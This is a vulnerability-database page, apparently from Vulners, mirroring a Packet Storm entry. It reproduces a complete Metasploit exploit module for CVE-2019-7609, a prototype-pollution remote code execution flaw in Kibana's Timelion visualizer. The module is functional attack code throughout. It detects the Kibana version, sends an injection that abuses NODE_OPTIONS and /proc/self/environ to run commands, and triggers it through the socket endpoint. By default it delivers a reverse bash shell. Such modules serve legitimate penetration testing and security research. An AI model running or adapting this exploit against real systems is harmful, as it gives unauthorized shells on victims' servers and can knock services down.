Vulners
Lucene search
Kibana Timelion Prototype Pollution Remote Code Execution
🗓️ 08 Sep 2023 00:00:00Reported by h00die, Gaetan Ferry, Michal Bentkowski, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 654 Views
10
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::Remote::HttpClient
prepend Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Kibana Timelion Prototype Pollution RCE',
'Description' => %q{
Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer.
An attacker with access to the Timelion application could send a request that will attempt to execute
javascript code. This leads to an arbitrary command execution with permissions of the
Kibana process on the host system.
Exploitation will require a service or system reboot to restore normal operation.
The WFSDELAY parameter is crucial for this exploit. Setting it too high will cause MANY shells
(50-100+), while setting it too low will cause no shells to be obtained. WFSDELAY of 10 for a
docker image caused 6 shells.
Tested against kibana 6.5.4.
},
'License' => MSF_LICENSE,
'Author' => [
'h00die', # msf module
'Michał Bentkowski', # original PoC, analysis
'Gaetan Ferry' # more analysis
],
'References' => [
[ 'URL', 'https://github.com/mpgn/CVE-2019-7609'],
[ 'URL', 'https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/'],
[ 'CVE', '2019-7609']
],
'Platform' => ['unix'],
'Privileged' => false,
'Arch' => ARCH_CMD,
'Targets' => [
[ 'Automatic Target', {}]
],
'DisclosureDate' => '2019-10-30',
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_bash',
'WfsDelay' => 10 # can take a minute to run
},
'Notes' => {
# the webserver doesn't die, but certain requests no longer respond before a timeout
# when things go poorly
'Stability' => [CRASH_SERVICE_DOWN],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
register_options(
[
Opt::RPORT(5601),
OptString.new('TARGETURI', [ true, 'The URI of the Kibana Application', '/'])
]
)
end
def check
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'app', 'kibana'),
'method' => 'GET',
'keep_cookies' => true
)
return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
# this pulls a big JSON blob that we need as it has the version
unless %r{<kbn-injected-metadata data="([^"]+)"></kbn-injected-metadata>} =~ res.body
return Exploit::CheckCode::Safe("#{peer} - Unexpected response, unable to determine version")
end
version_json = CGI.unescapeHTML(Regexp.last_match(1))
begin
json_body = JSON.parse(version_json)
rescue JSON::ParserError
return Exploit::CheckCode::Safe("#{peer} - Unexpected response, unable to determine version")
end
return Exploit::CheckCode::Safe("#{peer} - Unexpected response, unable to determine version") if json_body['version'].nil?
@version = json_body['version']
if Rex::Version.new(@version) < Rex::Version.new('5.6.15') ||
(
Rex::Version.new(@version) < Rex::Version.new('6.6.1') &&
Rex::Version.new(@version) >= Rex::Version.new('6.0.0')
)
return CheckCode::Appears("Exploitable Version Detected: #{@version}")
end
CheckCode::Safe("Unexploitable Version Detected: #{@version}")
end
def get_xsrf
vprint_status('Grabbing XSRF Token')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'bundles', 'canvas.bundle.js'),
'keep_cookies' => true
)
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 200
return Regexp.last_match(1) if /"kbn-xsrf":"([^"]+)"/ =~ res.body
nil
end
def trigger_socket
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'socket.io/'), # trailing / is required
'keep_cookies' => true,
'headers' => {
'kbn-xsrf' => @xsrf
},
'vars_get' => {
'EIO' => 3,
'transport' => 'polling'
}
)
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 200
end
def send_injection(reset: false)
if reset
pload = ".es(*).props(label.__proto__.env.AAAA='').props(label.__proto__.env.NODE_OPTIONS='')"
else
# we leave a marker for our payload to avoid having .to_json process it and make it unusable by the host OS
pload = %|.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("PAYLOADHERE");process.exit()//').props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')|
end
body = {
'sheet' => [pload],
'time' => {
'from' => 'now-15m',
'to' => 'now',
'mode' => 'quick',
'interval' => 'auto',
'timezone' => 'America/New_York'
}
}
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'api', 'timelion', 'run'),
'method' => 'POST',
'ctype' => 'application/json',
'headers' => { 'kbn-version' => @version },
'data' => body.to_json.sub('PAYLOADHERE', payload.encoded.gsub("'", "\\\\\\\\\\\\\\\\'")),
'keep_cookies' => true
)
Rex.sleep(2) # let this take hold, if we go too fast we dont get the shell
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 200
end
def exploit
check if @version.nil?
print_status('Polluting Prototype in Timelion')
send_injection
@xsrf = get_xsrf
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to grab XSRF token") if @xsrf.nil?
print_status('Trigginger payload execution via canvas socket')
trigger_socket
print_status('Waiting for shells')
Rex.sleep(datastore['WFSDELAY'] / 10)
unless @reset_done
print_status('Unsetting to stop raining shells from a lacerated kibana')
send_injection(reset: true)
trigger_socket
end
end
def on_new_session(_client)
return if @reset_done
print_status('Unsetting to stop raining shells from a lacerated kibana')
send_injection(reset: true)
trigger_socket
@reset_done = true
ensure
super
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Sep 2023 00:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.19.8 - 10
CVSS 210
EPSS0.94429